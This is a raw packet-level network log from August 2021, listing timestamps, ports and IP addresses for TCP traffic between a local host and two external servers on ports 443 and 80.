Aug 20, 2021 17:10:47.662518978 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662529945 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662533998 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662549019 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662558079 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662563086 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662579060 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662580013 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662595987 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662610054 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662612915 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662627935 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662642956 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662643909 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662657976 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662673950 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662714958 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.662733078 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.662821054 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.677606106 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.745708942 CEST	49724	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.773766994 CEST	80	49724	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.774081945 CEST	49724	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.778556108 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.806122065 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.806287050 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.806746006 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.806878090 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.807041883 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.807146072 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.832839012 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.832863092 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.832907915 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.832922935 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.832937002 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833007097 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.833034992 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.833465099 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833479881 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833539009 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.833586931 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.833621979 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833638906 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833651066 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833661079 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833667994 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.833690882 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.833709955 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.833741903 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859215975 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859302998 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859369993 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859457970 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859484911 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859529018 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859544992 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859600067 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859622955 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859637022 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859662056 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859680891 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859714985 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859729052 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859750986 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859776974 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859786034 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859793901 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859817982 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859823942 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859859943 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859862089 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859895945 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859896898 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859931946 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859951973 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.859976053 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.859985113 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.860004902 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.860016108 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.860053062 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.860063076 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.860091925 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.860094070 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.860124111 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.860130072 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.860157967 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.860224009 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.886348963 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886387110 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886408091 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886426926 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886445045 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886456966 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886476040 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886488914 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886491060 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.886508942 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886533976 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886535883 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.886562109 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886589050 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886610985 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886637926 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886658907 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886682034 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886703014 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886725903 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886750937 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886773109 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886898994 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886923075 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886945009 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.886962891 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887087107 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887109995 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887154102 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887178898 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887301922 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887332916 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887358904 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887378931 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887398005 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887490988 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887516022 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887538910 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887557030 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.887573957 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.912753105 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.912774086 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.912841082 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.912853956 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.914127111 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.914213896 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.209268093 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.210406065 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.235295057 CEST	80	49725	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.235452890 CEST	49725	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.236375093 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.236505032 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.261291027 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.261396885 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.261554003 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.261653900 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.287285089 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287308931 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287398100 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287410021 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287477970 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287488937 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287496090 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287516117 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287530899 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287544966 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287550926 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.287554979 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.287657022 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.287698984 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.290249109 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.290436029 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.313513994 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.313539982 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.313554049 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.313570976 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.313586950 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.313600063 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.313683033 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.314069986 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314091921 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314101934 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314110994 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314125061 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314135075 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314148903 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314166069 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314168930 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.314176083 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314186096 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314201117 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314209938 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.314224005 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.314294100 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.317394972 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.317419052 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.317512989 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.317620039 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.339595079 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339613914 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339622021 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339632988 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339652061 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339665890 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339673042 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.339684963 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339703083 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339709044 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.339762926 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339776993 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.339950085 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340198994 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340219975 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340235949 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340260029 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340270042 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340329885 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340344906 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340358019 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340437889 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340454102 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340466976 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340578079 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340590954 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340701103 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340718985 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340734959 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340748072 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340759993 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340774059 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340785027 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340799093 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340806961 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.340903044 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.343492031 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.343507051 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.343513966 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.343537092 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.365626097 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.365655899 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.378266096 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.378817081 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.378915071 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.638160944 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.651189089 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.665424109 CEST	80	49726	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.665509939 CEST	49726	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.677383900 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.677476883 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.688899994 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.688978910 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.689171076 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.690037966 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.715728045 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.715837002 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716180086 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716204882 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716253042 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716283083 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716284037 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716308117 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716335058 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716358900 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716373920 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716383934 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716392040 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716408968 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716419935 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716434956 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716445923 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716464043 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716470957 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.716490984 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.716555119 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.744486094 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.744504929 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.744556904 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.744646072 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.748828888 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748847008 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748861074 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748874903 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748888016 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748898029 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.748905897 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748919964 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748929977 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.748934031 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.748945951 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.748959064 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.748971939 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.748994112 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.749018908 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749033928 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749047041 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749061108 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749070883 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.749073982 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749090910 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749108076 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749118090 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.749125004 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.749140024 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.749151945 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.749161959 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.749203920 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.770237923 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.770260096 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.770313978 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.770327091 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.770338058 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.770348072 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.770426989 CEST	49727	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:48.775397062 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775412083 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775425911 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775439024 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775454998 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775480986 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775496006 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775509119 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775558949 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775608063 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775638103 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775652885 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775809050 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775840044 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775855064 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775870085 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775883913 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775899887 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775932074 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775945902 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775959969 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775975943 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.775990963 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776004076 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776024103 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776040077 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776053905 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776066065 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776076078 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776249886 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776263952 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.776277065 CEST	80	49727	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:48.797008038 CEST	80	49727	109.234.32.63	192.168.2.3
